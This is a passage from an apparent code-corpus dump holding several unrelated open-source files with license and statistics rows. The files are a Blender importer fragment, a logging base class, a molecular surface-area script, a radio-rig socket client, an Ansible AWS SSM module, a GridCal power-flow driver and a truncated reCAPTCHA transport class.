wheel3loc = to_blender_coord(params["wheel"][3]["offset1"])
folder = os.sep.join(filepath.split(os.sep)[:-1])
# Checks if the wheel models exist
wheel0_modelnum = int(params["wheel"][0]["modelnum"])
if wheel0_modelnum >= 0:
wheel0 = params["model"][wheel0_modelnum]
if wheel0.split(os.sep)[-1] in os.listdir(folder):
wheel0path = os.sep.join([folder, wheel0.split(os.sep)[-1]])
else:
wheel0 = None
wheel1_modelnum = int(params["wheel"][1]["modelnum"])
if wheel1_modelnum >= 0:
wheel1 = params["model"][wheel1_modelnum]
if wheel1.split(os.sep)[-1] in os.listdir(folder):
wheel1path = os.sep.join([folder, wheel1.split(os.sep)[-1]])
else:
wheel1 = None
wheel2_modelnum = int(params["wheel"][2]["modelnum"])
if wheel2_modelnum >= 0:
wheel2 = params["model"][wheel2_modelnum]
if wheel2.split(os.sep)[-1] in os.listdir(folder):
wheel2path = os.sep.join([folder, wheel2.split(os.sep)[-1]])
else:
wheel2 = None
wheel3_modelnum = int(params["wheel"][3]["modelnum"])
if wheel3_modelnum >= 0:
wheel3 = params["model"][wheel3_modelnum]
if wheel3.split(os.sep)[-1] in os.listdir(folder):
wheel3path = os.sep.join([folder, wheel3.split(os.sep)[-1]])
else:
wheel3 = None
# Checks if the body is in the same folder
if body.split(os.sep)[-1] in os.listdir(folder):
bodypath = os.sep.join([folder, body.split(os.sep)[-1]])
# Creates the car body and sets the offset
body_obj = prm_in.import_file(bodypath, scene)
body_obj.location = body_loc
# Creates the wheel objects or an empty if the wheel file is not present
if wheel0:
wheel = prm_in.import_file(wheel0path, scene)
else:
wheel = bpy.data.objects.new("wheel 0", None)
scene.objects.link(wheel)
wheel.empty_draw_type = "SPHERE"
wheel.empty_draw_size = 0.1
wheel.location = wheel0loc
wheel.parent = body_obj
if wheel1:
wheel = prm_in.import_file(wheel1path, scene)
else:
wheel = bpy.data.objects.new("wheel 1", None)
scene.objects.link(wheel)
wheel.empty_draw_type = "SPHERE"
wheel.empty_draw_size = 0.1
wheel.location = wheel1loc
wheel.parent = body_obj
if wheel2:
wheel = prm_in.import_file(wheel2path, scene)
else:
wheel = bpy.data.objects.new("wheel 2", None)
scene.objects.link(wheel)
wheel.empty_draw_type = "SPHERE"
wheel.empty_draw_size = 0.1
wheel.location = wheel2loc
wheel.parent = body_obj
if wheel3:
wheel = prm_in.import_file(wheel3path, scene)
else:
wheel = bpy.data.objects.new("wheel 3", None)
scene.objects.link(wheel)
wheel.empty_draw_type = "SPHERE"
wheel.empty_draw_size = 0.1
wheel.location = wheel3loc
wheel.parent = body_obj
# Aerial representation
aerial_loc = to_blender_coord(params["aerial"]["offset"])
aerial = bpy.data.objects.new( "aerial", None )
scene.objects.link(aerial)
aerial.location = aerial_loc
aerial.empty_draw_size = 0.1
aerial.empty_draw_type = 'PLAIN_AXES'
aerial.parent = body_obj
| gpl-3.0 | 5,301,716,076,450,188,000 | 30.390071 | 76 | 0.611999 | false |
wolcomm/rptk | rptk/base.py | 1 | 3743 | # Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk base module."""
from __future__ import print_function
from __future__ import unicode_literals
import inspect
import logging
class BaseObject(object):
"""BaseObject class providing generic logging functionality."""
def __init__(self):
"""Initialise object."""
self._log = logging.getLogger(self.__module__)
def __repr__(self):
"""Provide generic string representation."""
return "{}() object".format(self.cls_name)
def __enter__(self):
"""Log context manager entry."""
self.log_ready_start()
self.log_ready_done()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Log context manager exit."""
self.log_exit_start()
self.log_exit_done()
@property
def opts(self):
"""Get self.opts if it exists."""
return getattr(self, "_opts", None)
@property
def log(self):
"""Get the current logger."""
return self._log
@property
def cls_name(self):
"""Get the class name of self."""
return self.__class__.__name__
@property
def current_method(self):
"""Get the currently executing method name."""
return inspect.currentframe().f_back.f_code.co_name
def log_init(self):
"""Log entry into the __init__ method."""
self.log.debug(msg="initialising {} instance".format(self.cls_name))
def log_init_done(self):
"""Log exit from an __init__ method."""
caller = inspect.currentframe().f_back.f_back.f_code.co_name
if caller == '__init__':
self.log.debug(msg="still initialising {} instance"
.format(self.cls_name))
else:
self.log.debug(msg="{} instance initialised".format(self.cls_name))
def log_method_enter(self, method=None):
"""Log entry into a class method."""
self.log.debug(msg="entering method {}.{}"
.format(self.cls_name, method))
def log_method_exit(self, method=None):
"""Log exit from a class method."""
self.log.debug(msg="leaving method {}.{}"
.format(self.cls_name, method))
def log_ready_start(self):
"""Log start of object initialisation."""
self.log.debug(msg="preparing {} for use".format(self))
def log_ready_done(self):
"""Log end of object initialisation."""
self.log.debug(msg="{} ready for use".format(self))
def log_exit_start(self):
"""Log start of object cleanup."""
self.log.debug(msg="cleaning up {}".format(self))
def log_exit_done(self):
"""Log end of object cleanup."""
self.log.debug(msg="finished cleaning up {}".format(self))
def raise_type_error(self, arg=None, cls=None):
"""Raise a TypeError with useful logging."""
msg = "argument {} ({}) not of type {}".format(arg.__name__, arg, cls)
self.log.error(msg=msg)
raise TypeError(msg)
def raise_runtime_error(self, msg=None):
"""Raise a RuntimeError with useful logging."""
self.log.error(msg=msg)
raise RuntimeError(msg)
| apache-2.0 | 8,040,617,203,420,518,000 | 32.720721 | 79 | 0.606733 | false |
platinhom/DailyTools | scripts/ESES_ElementArea.py | 1 | 3679 | #! /usr/bin/env python
# -*- coding: utf8 -*-
# Author: Platinhom; Last Updated: 2015-09-10
# Calculate each element surface area by MS_Intersection and also match the atomic area results to the pqr file.
# Usage: python ESES_ElementArea.py file.pqr
#
# Need: MS_Intersection (partition version)
# Note: Only for PQR format input.
# Custom: ESES parameters.
import os,sys
# Modify the ESES program parameter here.
# You can modify to command line input parameter as you like
probe=1.4
grid=0.2
buffer=4.0
if (__name__ == '__main__'):
fname=sys.argv[1]
fnamelist=os.path.splitext(fname)
fxyzr=open(fnamelist[0]+".xyzr",'w')
fr=open(fname)
inlines=fr.readlines();
fr.close();
# All elements/types of input atoms, used in element area summary.
atomtypes=[];
# Write out the corresponding xyzr file.
for line in inlines:
# Each atom
if (line[:4]=="ATOM" or line[:6]=="HETATM"):
# Atom element here
tmp=line.split();
element=tmp[-1].upper();
atomtypes.append(element);
# Extract x, y, z, r from pqr to xyzr file
radius="%10.5f" % float(line[62:70].strip());
xcoor="%10.5f" % float(line[30:38].strip());
ycoor="%10.5f" % float(line[38:46].strip());
zcoor="%10.5f" % float(line[46:54].strip());
xyzrstr=xcoor+ycoor+zcoor+radius+"\n";
fxyzr.write(xyzrstr);
fxyzr.close()
# Use external ESES program to generate surface and calculate atom area
## So you have to put the ESES program in the same directory
# Output a "partition_area.txt" file saving atom area
#os.system('./MS_Intersection_Area '+fnamelist[0]+".xyzr "+str(probe)+" "+str(grid)+" "+str(buffer));
p=os.popen('./MS_Intersection '+fnamelist[0]+".xyzr "+str(probe)+" "+str(grid)+" "+str(buffer),'r')
totalArea="0"
totalVolume="0"
while 1:
line=p.readline();
if "area:" in line: totalArea=line.split(':')[1].split()[0]
if "volume:" in line: totalVolume=line.split(':')[1].split()[0]
if not line:break
# Analyze output atom area file
fa=open("partition_area.txt")
atomareas=[];# tmp save atom area by atom number
typedefault=["H","C","N","O","F","S","P","CL","BR","I"];
typeareas={"H":0.0,"C":0.0,"N":0.0,"O":0.0,"F":0.0,"S":0.0,"P":0.0,"CL":0.0,"BR":0.0,"I":0.0};
atomnum=0;
for line in fa:
tmp=line.split();
atomarea="%12.6f" % float(tmp[1]);
atomareas.append(atomarea);
atype=atomtypes[atomnum];
typeareas[atype]=typeareas.setdefault(atype,0.0)+float(tmp[1]);
atomnum=atomnum+1;
fa.close()
# Write out pqra file saving atom area
fwname=fnamelist[0]+"_area.pqra"
fw=open(fwname,'w')
# Write the total area for each element.
## Notice that here just write out the default elements.
## If you want all elements, use "typeused" for iteration.
typeused=["H","C","N","O","F","S","P","CL","BR","I"];
for i in typeareas.iterkeys():
if i not in typeused:typeused.append(i);
# For print out the atom area summary
outputelearea=fnamelist[0]+" Areas: "+totalArea+" Volumes: "+totalVolume+" ";
fw.write("REMARK AREAS "+totalArea+"\n");
fw.write("REMARK VOLUMES "+totalVolume+"\n");
for element in typedefault:
# If you want all elements, need to comment the above line and uncomment the following line.
#for element in typeused:
fw.write("REMARK AREA "+"%2s"%element+" "+"%20.6f"%typeareas.get(element,0.0)+"\n");
outputelearea=outputelearea+element+": "+str(typeareas[element])+" ";
print outputelearea
fr=open(fname)
atomnum=0;
for line in fr:
if (line[:4]=="ATOM" or line[:6]=="HETATM"):
tmp=line.split();
element=tmp[-1].upper();
newline=line.strip('\n')+atomareas[atomnum]+"\n";
fw.write(newline);
atomnum=atomnum+1;
else:
fw.write(line);
fr.close();
fw.close()
#end main
| gpl-2.0 | -1,598,104,058,107,988,000 | 32.144144 | 112 | 0.65969 | false |
ea4gja/mrig | mrig/mrig.py | 1 | 1349 | #!/usr/bin/env python
#
# File: mrig.py
# Version: 1.0
#
# mrig: main program
# Copyright (c) 2016 German EA4GJA
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
from mrig_config import *
from gui_tkinter import *
import sys
import socket
import os
from Tkinter import Tk
import multiprocessing
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
tcp.connect((REMOTE_SERVER, REMOTE_SERVER_TCP_PORT))
tcp.setblocking(1)
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(("", LOCAL_UDP_PORT))
udp.setblocking(0)
root = Tk()
gui = gui_Tkinter(root, tcp=tcp, udp=udp)
root.mainloop()
tcp.close()
udp.close()
| gpl-2.0 | -2,723,161,411,879,875,600 | 27.104167 | 67 | 0.749444 | false |
Lujeni/ansible | lib/ansible/modules/cloud/amazon/aws_ssm_parameter_store.py | 1 | 7817 | #!/usr/bin/python
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: aws_ssm_parameter_store
short_description: Manage key-value pairs in aws parameter store.
description:
- Manage key-value pairs in aws parameter store.
version_added: "2.5"
options:
name:
description:
- Parameter key name.
required: true
type: str
description:
description:
- Parameter key description.
required: false
type: str
value:
description:
- Parameter value.
required: false
type: str
state:
description:
- Creates or modifies an existing parameter.
- Deletes a parameter.
required: false
choices: ['present', 'absent']
default: present
type: str
string_type:
description:
- Parameter String type.
required: false
choices: ['String', 'StringList', 'SecureString']
default: String
type: str
decryption:
description:
- Work with SecureString type to get plain text secrets
type: bool
required: false
default: true
key_id:
description:
- AWS KMS key to decrypt the secrets.
- The default key (C(alias/aws/ssm)) is automatically generated the first
time it's requested.
required: false
default: alias/aws/ssm
type: str
overwrite_value:
description:
- Option to overwrite an existing value if it already exists.
required: false
version_added: "2.6"
choices: ['never', 'changed', 'always']
default: changed
type: str
author:
- Nathan Webster (@nathanwebsterdotme)
- Bill Wang (@ozbillwang) <[email protected]>
- Michael De La Rue (@mikedlr)
extends_documentation_fragment:
- aws
- ec2
requirements: [ botocore, boto3 ]
'''
EXAMPLES = '''
- name: Create or update key/value pair in aws parameter store
aws_ssm_parameter_store:
name: "Hello"
description: "This is your first key"
value: "World"
- name: Delete the key
aws_ssm_parameter_store:
name: "Hello"
state: absent
- name: Create or update secure key/value pair with default kms key (aws/ssm)
aws_ssm_parameter_store:
name: "Hello"
description: "This is your first key"
string_type: "SecureString"
value: "World"
- name: Create or update secure key/value pair with nominated kms key
aws_ssm_parameter_store:
name: "Hello"
description: "This is your first key"
string_type: "SecureString"
key_id: "alias/demo"
value: "World"
- name: Always update a parameter store value and create a new version
aws_ssm_parameter_store:
name: "overwrite_example"
description: "This example will always overwrite the value"
string_type: "String"
value: "Test1234"
overwrite_value: "always"
- name: recommend to use with aws_ssm lookup plugin
debug: msg="{{ lookup('aws_ssm', 'hello') }}"
'''
RETURN = '''
put_parameter:
description: Add one or more parameters to the system.
returned: success
type: dict
delete_parameter:
description: Delete a parameter from the system.
returned: success
type: dict
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import boto3_conn, get_aws_connection_info
try:
from botocore.exceptions import ClientError
except ImportError:
pass # will be captured by imported HAS_BOTO3
def update_parameter(client, module, args):
changed = False
response = {}
try:
response = client.put_parameter(**args)
changed = True
except ClientError as e:
module.fail_json_aws(e, msg="setting parameter")
return changed, response
def create_update_parameter(client, module):
changed = False
existing_parameter = None
response = {}
args = dict(
Name=module.params.get('name'),
Value=module.params.get('value'),
Type=module.params.get('string_type')
)
if (module.params.get('overwrite_value') in ("always", "changed")):
args.update(Overwrite=True)
else:
args.update(Overwrite=False)
if module.params.get('description'):
args.update(Description=module.params.get('description'))
if module.params.get('string_type') == 'SecureString':
args.update(KeyId=module.params.get('key_id'))
try:
existing_parameter = client.get_parameter(Name=args['Name'], WithDecryption=True)
except Exception:
pass
if existing_parameter:
if (module.params.get('overwrite_value') == 'always'):
(changed, response) = update_parameter(client, module, args)
elif (module.params.get('overwrite_value') == 'changed'):
if existing_parameter['Parameter']['Type'] != args['Type']:
(changed, response) = update_parameter(client, module, args)
if existing_parameter['Parameter']['Value'] != args['Value']:
(changed, response) = update_parameter(client, module, args)
if args.get('Description'):
# Description field not available from get_parameter function so get it from describe_parameters
describe_existing_parameter = None
try:
describe_existing_parameter_paginator = client.get_paginator('describe_parameters')
describe_existing_parameter = describe_existing_parameter_paginator.paginate(
Filters=[{"Key": "Name", "Values": [args['Name']]}]).build_full_result()
except ClientError as e:
module.fail_json_aws(e, msg="getting description value")
if describe_existing_parameter['Parameters'][0]['Description'] != args['Description']:
(changed, response) = update_parameter(client, module, args)
else:
(changed, response) = update_parameter(client, module, args)
return changed, response
def delete_parameter(client, module):
response = {}
try:
response = client.delete_parameter(
Name=module.params.get('name')
)
except ClientError as e:
if e.response['Error']['Code'] == 'ParameterNotFound':
return False, {}
module.fail_json_aws(e, msg="deleting parameter")
return True, response
def setup_client(module):
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
connection = boto3_conn(module, conn_type='client', resource='ssm', region=region, endpoint=ec2_url, **aws_connect_params)
return connection
def setup_module_object():
argument_spec = dict(
name=dict(required=True),
description=dict(),
value=dict(required=False, no_log=True),
state=dict(default='present', choices=['present', 'absent']),
string_type=dict(default='String', choices=['String', 'StringList', 'SecureString']),
decryption=dict(default=True, type='bool'),
key_id=dict(default="alias/aws/ssm"),
overwrite_value=dict(default='changed', choices=['never', 'changed', 'always']),
)
return AnsibleAWSModule(
argument_spec=argument_spec,
)
def main():
module = setup_module_object()
state = module.params.get('state')
client = setup_client(module)
invocations = {
"present": create_update_parameter,
"absent": delete_parameter,
}
(changed, response) = invocations[state](client, module)
module.exit_json(changed=changed, response=response)
if __name__ == '__main__':
main()
| gpl-3.0 | 6,053,639,846,693,307,000 | 28.609848 | 126 | 0.643214 | false |
SanPen/GridCal | src/GridCal/Engine/Simulations/LinearFactors/linear_analysis_ts_driver.py | 1 | 10126 | # This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import json
import pandas as pd
import numpy as np
import scipy.sparse as sp
from scipy.sparse.linalg import spsolve, factorized
import time
from GridCal.Engine.Simulations.result_types import ResultTypes
from GridCal.Engine.Core.multi_circuit import MultiCircuit
from GridCal.Engine.Simulations.PowerFlow.power_flow_options import PowerFlowOptions
from GridCal.Engine.Simulations.LinearFactors.linear_analysis import LinearAnalysis
from GridCal.Engine.Simulations.LinearFactors.linear_analysis_driver import LinearAnalysisOptions
from GridCal.Engine.Simulations.results_model import ResultsModel
from GridCal.Engine.Core.time_series_pf_data import compile_time_circuit
from GridCal.Engine.Simulations.driver_types import SimulationTypes
from GridCal.Engine.Simulations.results_template import ResultsTemplate
from GridCal.Engine.Simulations.driver_template import TSDriverTemplate
class LinearAnalysisTimeSeriesResults(ResultsTemplate):
def __init__(self, n, m, time_array, bus_names, bus_types, branch_names):
"""
TimeSeriesResults constructor
@param n: number of buses
@param m: number of branches
@param nt: number of time steps
"""
ResultsTemplate.__init__(self,
name='Linear Analysis time series',
available_results=[ResultTypes.BusActivePower,
ResultTypes.BranchActivePowerFrom,
ResultTypes.BranchLoading
],
data_variables=['bus_names',
'bus_types',
'time',
'branch_names',
'voltage',
'S',
'Sf',
'loading',
'losses'])
self.nt = len(time_array)
self.m = m
self.n = n
self.time = time_array
self.bus_names = bus_names
self.bus_types = bus_types
self.branch_names = branch_names
self.voltage = np.ones((self.nt, n), dtype=float)
self.S = np.zeros((self.nt, n), dtype=float)
self.Sf = np.zeros((self.nt, m), dtype=float)
self.loading = np.zeros((self.nt, m), dtype=float)
self.losses = np.zeros((self.nt, m), dtype=float)
def apply_new_time_series_rates(self, nc: "TimeCircuit"):
rates = nc.Rates.T
self.loading = self.Sf / (rates + 1e-9)
def get_results_dict(self):
"""
Returns a dictionary with the results sorted in a dictionary
:return: dictionary of 2D numpy arrays (probably of complex numbers)
"""
data = {'V': self.voltage.tolist(),
'P': self.S.real.tolist(),
'Q': self.S.imag.tolist(),
'Sbr_real': self.Sf.real.tolist(),
'Sbr_imag': self.Sf.imag.tolist(),
'loading': np.abs(self.loading).tolist()}
return data
def mdl(self, result_type: ResultTypes) -> "ResultsModel":
"""
Get ResultsModel instance
:param result_type:
:return: ResultsModel instance
"""
if result_type == ResultTypes.BusActivePower:
labels = self.bus_names
data = self.S
y_label = '(MW)'
title = 'Bus active power '
elif result_type == ResultTypes.BranchActivePowerFrom:
labels = self.branch_names
data = self.Sf.real
y_label = '(MW)'
title = 'Branch power '
elif result_type == ResultTypes.BranchLoading:
labels = self.branch_names
data = self.loading * 100
y_label = '(%)'
title = 'Branch loading '
elif result_type == ResultTypes.BranchLosses:
labels = self.branch_names
data = self.losses
y_label = '(MVA)'
title = 'Branch losses'
elif result_type == ResultTypes.BusVoltageModule:
labels = self.bus_names
data = self.voltage
y_label = '(p.u.)'
title = 'Bus voltage'
else:
raise Exception('Result type not understood:' + str(result_type))
if self.time is not None:
index = self.time
else:
index = list(range(data.shape[0]))
# assemble model
return ResultsModel(data=data, index=index, columns=labels, title=title, ylabel=y_label, units=y_label)
class LinearAnalysisTimeSeries(TSDriverTemplate):
name = 'Linear analysis time series'
tpe = SimulationTypes.LinearAnalysis_TS_run
def __init__(self, grid: MultiCircuit, options: LinearAnalysisOptions, start_=0, end_=None):
"""
TimeSeries constructor
@param grid: MultiCircuit instance
@param options: LinearAnalysisOptions instance
"""
TSDriverTemplate.__init__(self, grid=grid, start_=start_, end_=end_)
self.options = options
self.results = LinearAnalysisTimeSeriesResults(n=0,
m=0,
time_array=[],
bus_names=[],
bus_types=[],
branch_names=[])
self.ptdf_driver = LinearAnalysis(grid=self.grid, distributed_slack=self.options.distribute_slack)
def get_steps(self):
"""
Get time steps list of strings
"""
return [l.strftime('%d-%m-%Y %H:%M') for l in self.indices]
def run(self):
"""
Run the time series simulation
@return:
"""
self.__cancel__ = False
a = time.time()
if self.end_ is None:
self.end_ = len(self.grid.time_profile)
time_indices = np.arange(self.start_, self.end_ + 1)
ts_numeric_circuit = compile_time_circuit(self.grid)
self.results = LinearAnalysisTimeSeriesResults(n=ts_numeric_circuit.nbus,
m=ts_numeric_circuit.nbr,
time_array=ts_numeric_circuit.time_array[time_indices],
bus_names=ts_numeric_circuit.bus_names,
bus_types=ts_numeric_circuit.bus_types,
branch_names=ts_numeric_circuit.branch_names)
self.indices = pd.to_datetime(ts_numeric_circuit.time_array[time_indices])
self.progress_text.emit('Computing PTDF...')
linear_analysis = LinearAnalysis(grid=self.grid,
distributed_slack=self.options.distribute_slack,
correct_values=self.options.correct_values
)
linear_analysis.run()
self.progress_text.emit('Computing branch flows...')
Pbus_0 = ts_numeric_circuit.Sbus.real[:, time_indices]
self.results.Sf = linear_analysis.get_flows_time_series(Pbus_0)
# compute post process
self.results.loading = self.results.Sf / (ts_numeric_circuit.Rates[:, time_indices].T + 1e-9)
self.results.S = Pbus_0.T
self.elapsed = time.time() - a
# send the finnish signal
self.progress_signal.emit(0.0)
self.progress_text.emit('Done!')
self.done_signal.emit()
if __name__ == '__main__':
from matplotlib import pyplot as plt
from GridCal.Engine import *
fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/IEEE39_1W.gridcal'
# fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/grid_2_islands.xlsx'
# fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/1354 Pegase.xlsx'
main_circuit = FileOpen(fname).open()
options_ = LinearAnalysisOptions()
ptdf_driver = LinearAnalysisTimeSeries(grid=main_circuit, options=options_)
ptdf_driver.run()
pf_options_ = PowerFlowOptions(solver_type=SolverType.NR)
ts_driver = TimeSeries(grid=main_circuit, options=pf_options_)
ts_driver.run()
fig = plt.figure()
ax1 = fig.add_subplot(221)
ax1.set_title('Newton-Raphson based flow')
ax1.plot(ts_driver.results.Sf.real)
ax2 = fig.add_subplot(222)
ax2.set_title('PTDF based flow')
ax2.plot(ptdf_driver.results.Sf.real)
ax3 = fig.add_subplot(223)
ax3.set_title('Difference')
diff = ts_driver.results.Sf.real - ptdf_driver.results.Sf.real
ax3.plot(diff)
fig2 = plt.figure()
ax1 = fig2.add_subplot(221)
ax1.set_title('Newton-Raphson based voltage')
ax1.plot(np.abs(ts_driver.results.voltage))
ax2 = fig2.add_subplot(222)
ax2.set_title('PTDF based voltage')
ax2.plot(ptdf_driver.results.voltage)
ax3 = fig2.add_subplot(223)
ax3.set_title('Difference')
diff = np.abs(ts_driver.results.voltage) - ptdf_driver.results.voltage
ax3.plot(diff)
plt.show()
| gpl-3.0 | -3,750,878,709,547,375,600 | 36.783582 | 111 | 0.567351 | false |
googleapis/googleapis-gen | google/cloud/recaptchaenterprise/v1beta1/recaptchaenterprise-v1beta1-py/google/cloud/recaptchaenterprise_v1beta1/services/recaptcha_enterprise_service_v1_beta1/transports/base.py | 1 | 9862 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.recaptchaenterprise_v1beta1.types import recaptchaenterprise
from google.protobuf import empty_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
'google-cloud-recaptchaenterprise',
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class RecaptchaEnterpriseServiceV1Beta1Transport(abc.ABC):
"""Abstract transport class for RecaptchaEnterpriseServiceV1Beta1."""
AUTH_SCOPES = (
'https://www.googleapis.com/auth/cloud-platform',
)
DEFAULT_HOST: str = 'recaptchaenterprise.googleapis.com'
def __init__(
self, *,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ':' not in host:
host += ':443'
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs("'credentials_file' and 'credentials' are mutually exclusive")
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file,
**scopes_kwargs,
quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(**scopes_kwargs, quota_project_id=quota_project_id)
# If the credentials is service account credentials, then always try to use self signed JWT.
if always_use_jwt_access and isinstance(credentials, service_account.Credentials) and hasattr(service_account.Credentials, "with_always_use_jwt_access"):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(cls, host: str, scopes: Optional[Sequence[str]]) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.create_assessment: gapic_v1.method.wrap_method(
self.create_assessment,
default_timeout=600.0,
client_info=client_info,
),
self.annotate_assessment: gapic_v1.method.wrap_method(
self.annotate_assessment,
default_timeout=600.0,
client_info=client_info,
),
self.create_key: gapic_v1.method.wrap_method(
self.create_key,
default_timeout=600.0,
client_info=client_info,
),
self.list_keys: gapic_v1.method.wrap_method(
self.list_keys,
default_timeout=600.0,
client_info=client_info,
),
self.get_key: gapic_v1.method.wrap_method(
self.get_key,
default_timeout=600.0,
client_info=client_info,
),
self.update_key: gapic_v1.method.wrap_method(
self.update_key,
default_timeout=600.0,
client_info=client_info,
),
self.delete_key: gapic_v1.method.wrap_method(
self.delete_key,
default_timeout=600.0,
client_info=client_info,
),
}
@property
def create_assessment(self) -> Callable[
[recaptchaenterprise.CreateAssessmentRequest],
Union[
recaptchaenterprise.Assessment,
Awaitable[recaptchaenterprise.Assessment]
]]:
raise NotImplementedError()
@property
def annotate_assessment(self) -> Callable[
[recaptchaenterprise.AnnotateAssessmentRequest],
Union[
recaptchaenterprise.AnnotateAssessmentResponse,
Awaitable[recaptchaenterprise.AnnotateAssessmentResponse]
]]:
raise NotImplementedError()
@property
def create_key(self) -> Callable[
[recaptchaenterprise.CreateKeyRequest],
Union[
recaptchaenterprise.Key,
Awaitable[recaptchaenterprise.Key]
]]:
raise NotImplementedError()
@property
def list_keys(self) -> Callable[
[recaptchaenterprise.ListKeysRequest],
Union[
recaptchaenterprise.ListKeysResponse,
Awaitable[recaptchaenterprise.ListKeysResponse]
]]:
raise NotImplementedError()
@property
def get_key(self) -> Callable[
[recaptchaenterprise.GetKeyRequest],
Union[
recaptchaenterprise.Key,
Awaitable[recaptchaenterprise.Key]
]]:
raise NotImplementedError()
@property
def update_key(self) -> Callable[
[recaptchaenterprise.UpdateKeyRequest],
Union[
recaptchaenterprise.Key,
Awaitable[recaptchaenterprise.Key]
]]:
